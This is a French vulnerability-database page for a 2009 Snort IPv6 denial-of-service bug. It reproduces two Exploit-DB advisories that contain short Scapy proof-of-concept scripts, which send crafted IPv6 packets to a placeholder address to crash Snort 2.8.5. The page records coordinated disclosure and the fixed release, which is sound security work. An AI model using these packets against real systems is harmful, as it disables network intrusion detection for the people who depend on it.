Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
4.3 |
|
AV:N/AC:M/Au:N/C:N/I:N/A:P |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 33306
Date de publication : 2009-10-21 22h00 +00:00
Auteur : laurent gaffie
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/36795/info
Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets.
Attackers can exploit these issues to crash the affected application, causing denial-of-service conditions.
These issues affect Snort 2.8.5; other versions may also be vulnerable.
You can reproduce theses two differents bugs easily by using the Python low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)
1) #only works on x86
#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP
2) # works x86,x64
#/usr/bin/env python
from scapy.all import *
z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)
Exploit Database EDB-ID : 9969
Date de publication : 2009-10-22 22h00 +00:00
Auteur : laurent gaffie
EDB Vérifié : Yes
=============================================
- Date: October 22th, 2009
- Discovered by: Laurent Gaffi�
- Severity: Low
=============================================
I. VULNERABILITY
-------------------------
Snort <= 2.8.5 IPV6 Remote DoS
II. DESCRIPTION
-------------------------
A remote DoS was present in Snort 2.8.5 when parsing some specialy IPv6
crafted packet
To trigger theses bugs you need to have compiled snort with the
--enable-ipv6 option, and run it in verbose mode (-v)
III. PROOF OF CONCEPT
-------------------------
You can reproduce theses two differents bugs easily by using the Python
low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)
1) #only works on x86
#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP
2) # works x86,x64
#/usr/bin/env python
from scapy.all import *
z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 ->
icmp (not v6)
IV. SYSTEMS AFFECTED
-------------------------
Theses proof of concept as been tested on snort:
- 2.8.5
V. NOT AFFECTED
-------------------------
Sourcefire 3D Sensor
VI. SOLUTION
-------------------------
A new version correcting theses issues as been released (2.8.5.1) :
http://www.snort.org/downloads
VII. REFERENCES
-------------------------
http://www.snort.org/
http://vrt-sourcefire.blogspot.com/
VIII. REVISION HISTORY
-------------------------
October 14th, 2009: First issue discovered, advisory send to snort team.
October 14th, 2009: Snort security team confirm the bug.
October 16th, 2009: Second issue discovered, advisory send to snort team.
October 20th, 2009: Snort security team confirm the bug.
October 22th, 2009: Snort team released a new version.
IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffi�
Laurent.gaffie{remove-this}(at)gmail.com
Products Mentioned
Configuraton 0
Snort>>Snort >> Version To (including) 2.8.3.5
Snort>>Snort >> Version 1.6
Snort>>Snort >> Version 1.8.0
Snort>>Snort >> Version 1.8.1
Snort>>Snort >> Version 1.8.2
Snort>>Snort >> Version 1.8.3
Snort>>Snort >> Version 1.8.4
Snort>>Snort >> Version 1.8.5
Snort>>Snort >> Version 1.8.6
Snort>>Snort >> Version 1.8.7
Snort>>Snort >> Version 1.9.0
Snort>>Snort >> Version 1.9.1
Snort>>Snort >> Version 2.0
Snort>>Snort >> Version 2.0
Snort>>Snort >> Version 2.6.1
Snort>>Snort >> Version 2.6.1.1
Snort>>Snort >> Version 2.6.1.2
Snort>>Snort >> Version 2.6.2
Snort>>Snort >> Version 2.7_beta1
Snort>>Snort >> Version 2.8.0
Snort>>Snort >> Version 2.8.2.2
Snort>>Snort >> Version 2.8.3
Snort>>Snort >> Version 2.8.3.1
Snort>>Snort >> Version 2.8.3.2
Snort>>Snort >> Version 2.8.3.4
Snort>>Snort >> Version 2.8.3.4.1
Références